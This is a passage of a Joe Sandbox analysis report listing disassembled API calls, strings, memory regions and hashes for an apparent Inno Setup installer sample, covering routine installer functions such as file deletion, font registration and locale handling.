                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: 74278830$742774272274286310A570Focus
                                                                            • String ID: k H
                                                                            • API String ID: 167376926-1447039187
                                                                            • Opcode ID: 69b514878c6882b8832b1f329327574619d6a3e89a85ba6a4f0b9ad1becc3db2
                                                                            • Instruction ID: 8a06375b061ea5bfc02952791cdae78cf5b61e443f36c9dad2d84499db0416b2
                                                                            • Opcode Fuzzy Hash: 69b514878c6882b8832b1f329327574619d6a3e89a85ba6a4f0b9ad1becc3db2
                                                                            • Instruction Fuzzy Hash: FE510975A002189FCB11DFA9C891AAEBBF9FF49700F15806AF504EB751D7789D40CBA4
                                                                            APIs
                                                                              • Part of subcall function 00450918: SetEndOfFile.KERNEL32(?,?,0045C6A6,00000000,0045C831,?,00000000,00000002,00000002), ref: 0045091F
                                                                              • Part of subcall function 00406F58: DeleteFileA.KERNEL32(00000000,0049B628,004980C1,00000000,00498116,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F63
                                                                            • GetWindowThreadProcessId.USER32(00000000,?), ref: 00495F55
                                                                            • OpenProcess.KERNEL32(00100000,00000000,?,00000000,?), ref: 00495F69
                                                                            • SendNotifyMessageA.USER32(00000000,0000054D,00000000,00000000), ref: 00495F83
                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,0000054D,00000000,00000000,00000000,?), ref: 00495F8F
                                                                            • CloseHandle.KERNEL32(00000000,00000000,000000FF,00000000,0000054D,00000000,00000000,00000000,?), ref: 00495F95
                                                                            • Sleep.KERNEL32(000001F4,00000000,0000054D,00000000,00000000,00000000,?), ref: 00495FA8
                                                                            Strings
                                                                            • Deleting Uninstall data files., xrefs: 00495ECB
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: FileProcess$CloseDeleteHandleMessageNotifyObjectOpenSendSingleSleepThreadWaitWindow
                                                                            • String ID: Deleting Uninstall data files.
                                                                            • API String ID: 1570157960-2568741658
                                                                            • Opcode ID: 23da1316c50969bb810f13416529c5ad46a4d90d4c3b6db3608d618ecf590902
                                                                            • Instruction ID: fec72cc46ef3efd5c3c8e8a450f489c3c08d507a48e2b84f6ee45df75d5b7e94
                                                                            • Opcode Fuzzy Hash: 23da1316c50969bb810f13416529c5ad46a4d90d4c3b6db3608d618ecf590902
                                                                            • Instruction Fuzzy Hash: 34219571304610AFEB11EB75ECC2B2637A8EB54338F61053BF504DA1E6D678AC008B1D
                                                                            APIs
                                                                              • Part of subcall function 0042DE2C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,c6H,?,00000001,?,?,00483663,?,00000001,00000000), ref: 0042DE48
                                                                            • RegSetValueExA.ADVAPI32(?,00000000,00000000,00000001,00000000,00000001,?,00000002,00000000,00000000,004705A1,?,?,?,?,00000000), ref: 0047050B
                                                                            • RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000001,00000000,00000001,?,00000002,00000000,00000000,004705A1), ref: 00470522
                                                                            • AddFontResourceA.GDI32(00000000), ref: 0047053F
                                                                            • SendNotifyMessageA.USER32(0000FFFF,0000001D,00000000,00000000), ref: 00470553
                                                                            Strings
                                                                            • Failed to open Fonts registry key., xrefs: 00470529
                                                                            • AddFontResource, xrefs: 0047055D
                                                                            • Failed to set value in Fonts registry key., xrefs: 00470514
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: CloseFontMessageNotifyOpenResourceSendValue
                                                                            • String ID: AddFontResource$Failed to open Fonts registry key.$Failed to set value in Fonts registry key.
                                                                            • API String ID: 955540645-649663873
                                                                            • Opcode ID: 2b4b64eddd1924655c58b9871aff7fb9a4f934a6e6bff31d8454543361526e14
                                                                            • Instruction ID: 66ce3b01f7eb708e2302e7809b1ea03697ff66c32de1c99646f3643d23023453
                                                                            • Opcode Fuzzy Hash: 2b4b64eddd1924655c58b9871aff7fb9a4f934a6e6bff31d8454543361526e14
                                                                            • Instruction Fuzzy Hash: 62216570741204BBDB10EA669C42FAE779D9B55708F50843BB904EB3C2D67CDE028A5D
                                                                            APIs
                                                                              • Part of subcall function 00416420: GetClassInfoA.USER32(00400000,?,?), ref: 0041648F
                                                                              • Part of subcall function 00416420: UnregisterClassA.USER32(?,00400000), ref: 004164BB
                                                                              • Part of subcall function 00416420: RegisterClassA.USER32(?), ref: 004164DE
                                                                            • GetVersion.KERNEL32 ref: 004631CC
                                                                            • SendMessageA.USER32(00000000,0000112C,00000004,00000004), ref: 0046320A
                                                                            • SHGetFileInfo.SHELL32(004632A8,00000000,?,00000160,00004011), ref: 00463227
                                                                            • LoadCursorA.USER32(00000000,00007F02), ref: 00463245
                                                                            • SetCursor.USER32(00000000,00000000,00007F02,004632A8,00000000,?,00000160,00004011), ref: 0046324B
                                                                            • SetCursor.USER32(?,0046328B,00007F02,004632A8,00000000,?,00000160,00004011), ref: 0046327E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: ClassCursor$Info$FileLoadMessageRegisterSendUnregisterVersion
                                                                            • String ID: Explorer
                                                                            • API String ID: 2594429197-512347832
                                                                            • Opcode ID: e51ab44d2e52b3d60675834673e9b9904728f2271d1ef9b75da4c79774d1131e
                                                                            • Instruction ID: b0d998c5e58c3251a46d3edbb0a2afbc6be3b3781793d4cbec8386629f90fe5f
                                                                            • Opcode Fuzzy Hash: e51ab44d2e52b3d60675834673e9b9904728f2271d1ef9b75da4c79774d1131e
                                                                            • Instruction Fuzzy Hash: FA21E7307403446AEB10FF795C57F9A7698DB09709F5040BFF605EA1C3EA7C8908866D
                                                                            APIs
                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,GetFinalPathNameByHandleA,02132BE0,?,?,?,02132BE0,00478450,00000000,0047856E,?,?,-00000010,?), ref: 004782A5
                                                                            • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004782AB
                                                                            • GetFileAttributesA.KERNEL32(00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02132BE0,?,?,?,02132BE0,00478450,00000000,0047856E,?,?,-00000010,?), ref: 004782BE
                                                                            • CreateFileA.KERNEL32(00000000,00000000,00000007,00000000,00000003,00000000,00000000,00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02132BE0,?,?,?,02132BE0), ref: 004782E8
                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,02132BE0,00478450,00000000,0047856E,?,?,-00000010,?), ref: 00478306
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: FileHandle$AddressAttributesCloseCreateModuleProc
                                                                            • String ID: GetFinalPathNameByHandleA$kernel32.dll
                                                                            • API String ID: 2704155762-2318956294
                                                                            • Opcode ID: 626e47d356fab76083b756a204e0250164ee9b03011d355f3d3167744cb8654e
                                                                            • Instruction ID: d6ca79aa4c48c3adffb9da4b01ee7f27494699adf3768a2d59cb90ace03db172
                                                                            • Opcode Fuzzy Hash: 626e47d356fab76083b756a204e0250164ee9b03011d355f3d3167744cb8654e
                                                                            • Instruction Fuzzy Hash: 5701C4707C0B0466E520316E4D8AFEB554C8B54B69F54813F7E0CEA2C2DDAE8D06016E
                                                                            APIs
                                                                            • GetLastError.KERNEL32(00000000,0045A2F2,?,00000000,00000000,00000000,?,00000006,?,00000000,0049722D,?,00000000,004972D0), ref: 0045A236
                                                                              • Part of subcall function 004543E0: FindClose.KERNEL32(000000FF,004544D6), ref: 004544C5
                                                                            Strings
                                                                            • Not stripping read-only attribute because the directory does not appear to be empty., xrefs: 0045A210
                                                                            • Stripped read-only attribute., xrefs: 0045A1F8
                                                                            • Failed to delete directory (%d). Will retry later., xrefs: 0045A24F
                                                                            • Deleting directory: %s, xrefs: 0045A1BF
                                                                            • Failed to strip read-only attribute., xrefs: 0045A204
                                                                            • Failed to delete directory (%d). Will delete on restart (if empty)., xrefs: 0045A2AB
                                                                            • Failed to delete directory (%d)., xrefs: 0045A2CC
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: CloseErrorFindLast
                                                                            • String ID: Deleting directory: %s$Failed to delete directory (%d).$Failed to delete directory (%d). Will delete on restart (if empty).$Failed to delete directory (%d). Will retry later.$Failed to strip read-only attribute.$Not stripping read-only attribute because the directory does not appear to be empty.$Stripped read-only attribute.
                                                                            • API String ID: 754982922-1448842058
                                                                            • Opcode ID: 3a6653ca049153ac913e3aecd6f83d976b01ed6d176f23095ac7eac981277501
                                                                            • Instruction ID: e72d66395cbcced70a1ff0d39e5b36b51bb4b2a363b16cebf3a96f2a9050ba33
                                                                            • Opcode Fuzzy Hash: 3a6653ca049153ac913e3aecd6f83d976b01ed6d176f23095ac7eac981277501
                                                                            • Instruction Fuzzy Hash: 9A41A730A042449ACB00DBA988463AE76A55F4930AF5486BBBC04D7393CB7D8E1D875F
                                                                            APIs
                                                                            • GetCapture.USER32 ref: 00422EB4
                                                                            • GetCapture.USER32 ref: 00422EC3
                                                                            • SendMessageA.USER32(00000000,0000001F,00000000,00000000), ref: 00422EC9
                                                                            • ReleaseCapture.USER32 ref: 00422ECE
                                                                            • GetActiveWindow.USER32 ref: 00422EDD
                                                                            • SendMessageA.USER32(00000000,0000B000,00000000,00000000), ref: 00422F5C
                                                                            • SendMessageA.USER32(00000000,0000B001,00000000,00000000), ref: 00422FC0
                                                                            • GetActiveWindow.USER32 ref: 00422FCF
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: CaptureMessageSend$ActiveWindow$Release
                                                                            • String ID:
                                                                            • API String ID: 862346643-0
                                                                            • Opcode ID: f8c2677d6609ac077b52c6186ee7afb2eac2e0eedff02b6813b422cc668acf14
                                                                            • Instruction ID: 0c1e69f79f034fd7694da938dfb4ae80f60ee9794ae3f0b0e2c785ff7ec3c7d8
                                                                            • Opcode Fuzzy Hash: f8c2677d6609ac077b52c6186ee7afb2eac2e0eedff02b6813b422cc668acf14
                                                                            • Instruction Fuzzy Hash: E4413F70B00254AFDB10EB6ADA42B9A77F1EF44304F5540BAF500AB392DB78AE40DB5D
                                                                            APIs
                                                                            • GetWindowLongA.USER32(?,000000F0), ref: 0042F2CA
                                                                            • GetWindowLongA.USER32(?,000000EC), ref: 0042F2E1
                                                                            • GetActiveWindow.USER32 ref: 0042F2EA
                                                                            • MessageBoxA.USER32(00000000,00000000,00000000,00000000), ref: 0042F317
                                                                            • SetActiveWindow.USER32(?,0042F447,00000000,?), ref: 0042F338
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: Window$ActiveLong$Message
                                                                            • String ID:
                                                                            • API String ID: 2785966331-0
                                                                            • Opcode ID: 511403c039d27e5fd3d4a37a0efbe646b1f0bba5a7b321b537e6f3b04ffedf77
                                                                            • Instruction ID: 0493a3c03df3966e51b4b777c60d25e7c68e0b9e8cdf2dbcd65ae894a3a71964
                                                                            • Opcode Fuzzy Hash: 511403c039d27e5fd3d4a37a0efbe646b1f0bba5a7b321b537e6f3b04ffedf77
                                                                            • Instruction Fuzzy Hash: 7631B471A00654AFDB01EFB5DC52E6EBBB8EB09714B91447AF804E3691D738AD10CB58
                                                                            APIs
                                                                            • 7427A570.USER32(00000000), ref: 0042949A
                                                                            • GetTextMetricsA.GDI32(00000000), ref: 004294A3
                                                                              • Part of subcall function 0041A1F8: CreateFontIndirectA.GDI32(?), ref: 0041A2B7
                                                                            • SelectObject.GDI32(00000000,00000000), ref: 004294B2
                                                                            • GetTextMetricsA.GDI32(00000000,?), ref: 004294BF
                                                                            • SelectObject.GDI32(00000000,00000000), ref: 004294C6
                                                                            • 7427A480.USER32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 004294CE
                                                                            • GetSystemMetrics.USER32(00000006), ref: 004294F3
                                                                            • GetSystemMetrics.USER32(00000006), ref: 0042950D
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: Metrics$7427ObjectSelectSystemText$A480A570CreateFontIndirect
                                                                            • String ID:
                                                                            • API String ID: 3862758150-0
                                                                            • Opcode ID: ed5406780fbe6b6ddf9677d4a66f370c2a77f814a30f66ac1398573dbf155f17
                                                                            • Instruction ID: f9189b99ec718bdc55f682ba078bc6b9c4dab98ca430e676b6dc028aca6f8884
                                                                            • Opcode Fuzzy Hash: ed5406780fbe6b6ddf9677d4a66f370c2a77f814a30f66ac1398573dbf155f17
                                                                            • Instruction Fuzzy Hash: 3301E1917087513BFB11B67A9CC2F6B61C8CB8435CF44043FFA459A3D2D96C9C80866A
                                                                            APIs
                                                                            • 7427A570.USER32(00000000,?,00419069,004985AE), ref: 0041DE37
                                                                            • 74284620.GDI32(00000000,0000005A,00000000,?,00419069,004985AE), ref: 0041DE41
                                                                            • 7427A480.USER32(00000000,00000000,00000000,0000005A,00000000,?,00419069,004985AE), ref: 0041DE4E
                                                                            • MulDiv.KERNEL32(00000008,00000060,00000048), ref: 0041DE5D
                                                                            • GetStockObject.GDI32(00000007), ref: 0041DE6B
                                                                            • GetStockObject.GDI32(00000005), ref: 0041DE77
                                                                            • GetStockObject.GDI32(0000000D), ref: 0041DE83
                                                                            • LoadIconA.USER32(00000000,00007F00), ref: 0041DE94
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: ObjectStock$7427$74284620A480A570IconLoad
                                                                            • String ID:
                                                                            • API String ID: 294535903-0
                                                                            • Opcode ID: c7b946ff5d18463f692f08f3109d9fac972284bfbf41894a6d0fe66ccf938658
                                                                            • Instruction ID: 4e0a0a69a1fbcc37fa68332f5170e2556ef2fd96a8c36c1a21edcb526b0e3b4b
                                                                            • Opcode Fuzzy Hash: c7b946ff5d18463f692f08f3109d9fac972284bfbf41894a6d0fe66ccf938658
                                                                            • Instruction Fuzzy Hash: E11100B06457015AE740FF666A92BA63694D724708F00813FF605AF3D2D7792C449B9E
                                                                            APIs
                                                                            • LoadCursorA.USER32(00000000,00007F02), ref: 004636B0
                                                                            • SetCursor.USER32(00000000,00000000,00007F02,00000000,00463745), ref: 004636B6
                                                                            • SetCursor.USER32(?,0046372D,00007F02,00000000,00463745), ref: 00463720
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: Cursor$Load
                                                                            • String ID: $ $Internal error: Item already expanding
                                                                            • API String ID: 1675784387-1948079669
                                                                            • Opcode ID: 11d96d50149c7a0783bfaa5a1745a1d7ac95eac117891e2e72ad5ff3e9801c67
                                                                            • Instruction ID: 5f7148262a90782ca5f39c73a98182432cf514ee5891adbc4e31059349ad3c9c
                                                                            • Opcode Fuzzy Hash: 11d96d50149c7a0783bfaa5a1745a1d7ac95eac117891e2e72ad5ff3e9801c67
                                                                            • Instruction Fuzzy Hash: EEB19270600284DFD710DF29C585B9ABBF1AF04319F14C4AAE8459B792E778EE48CF5A
                                                                            APIs
                                                                            • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00453E03
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: PrivateProfileStringWrite
                                                                            • String ID: .tmp$MoveFileEx$NUL$WININIT.INI$[rename]
                                                                            • API String ID: 390214022-3304407042
                                                                            • Opcode ID: 4808755b3c6221495a972d98e090ec94bd7c13575b017f43438820c08e4f7dc1
                                                                            • Instruction ID: f7f3e57e327ad0b7fc32dd9a0c0ef844c3cf52932767352b59a94e8a2e0b7a1e
                                                                            • Opcode Fuzzy Hash: 4808755b3c6221495a972d98e090ec94bd7c13575b017f43438820c08e4f7dc1
                                                                            • Instruction Fuzzy Hash: 0E910534E001099BDB01EFA5D842BDEB7F5EF4874AF50806AE90077292D7786E49CB59
                                                                            APIs
                                                                            • GetClassInfoW.USER32(00000000,COMBOBOX,?), ref: 00476BC5
                                                                            • 742859E0.USER32(00000000,000000FC,00476B20,00000000,00476E04,?,00000000,00476E2E), ref: 00476BEC
                                                                            • GetACP.KERNEL32(00000000,00476E04,?,00000000,00476E2E), ref: 00476C29
                                                                            • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00476C6F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: 742859ClassInfoMessageSend
                                                                            • String ID: COMBOBOX$Inno Setup: Language
                                                                            • API String ID: 1333258245-4234151509
                                                                            • Opcode ID: 93cc19c1f2ae3cdeb94a735bb7db030fa770b3f4550c722f8e96ab60bc3149ff
                                                                            • Instruction ID: 76a62d5c2b18ddabed1a1f2db415f61daf58d6c828ad3828204ddc2489713d7e
                                                                            • Opcode Fuzzy Hash: 93cc19c1f2ae3cdeb94a735bb7db030fa770b3f4550c722f8e96ab60bc3149ff
                                                                            • Instruction Fuzzy Hash: 4E813C346006059FC720DF69C985AEAB7F2FB09304F1580BAE849E7762D738ED41CB59
                                                                            APIs
                                                                            • GetSystemDefaultLCID.KERNEL32(00000000,00408970,?,?,?,?,00000000,00000000,00000000,?,00409977,00000000,0040998A), ref: 00408742
                                                                              • Part of subcall function 00408570: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049B4C0,00000001,?,0040863B,?,00000000,0040871A), ref: 0040858E
                                                                              • Part of subcall function 004085BC: GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,004087BE,?,?,?,00000000,00408970), ref: 004085CF
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: InfoLocale$DefaultSystem
                                                                            • String ID: AMPM$:mm$:mm:ss$m/d/yy$mmmm d, yyyy
                                                                            • API String ID: 1044490935-665933166
                                                                            • Opcode ID: c01586f9bbb032a7f0f1a98200a37c80c0f70fbac98b28b944ff8a28395f8419
                                                                            • Instruction ID: bf07bec6589cb82417a29d9109d5e68838e6a5c97ac1b9e4b464d3d1e075229e
                                                                            • Opcode Fuzzy Hash: c01586f9bbb032a7f0f1a98200a37c80c0f70fbac98b28b944ff8a28395f8419
                                                                            • Instruction Fuzzy Hash: 55513E24B00108ABD701FBA69E41A9E77A9DB94304F50C07FA541BB3C7DA3DDE05975D
                                                                            APIs
                                                                            • GetVersion.KERNEL32(00000000,00411909), ref: 0041179C
                                                                            • InsertMenuItemA.USER32(?,000000FF,00000001,0000002C), ref: 0041185A
                                                                              • Part of subcall function 00411ABC: CreatePopupMenu.USER32 ref: 00411AD6
                                                                            • InsertMenuA.USER32(?,000000FF,?,?,00000000), ref: 004118E6
                                                                              • Part of subcall function 00411ABC: CreateMenu.USER32 ref: 00411AE0
                                                                            • InsertMenuA.USER32(?,000000FF,?,00000000,00000000), ref: 004118CD
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
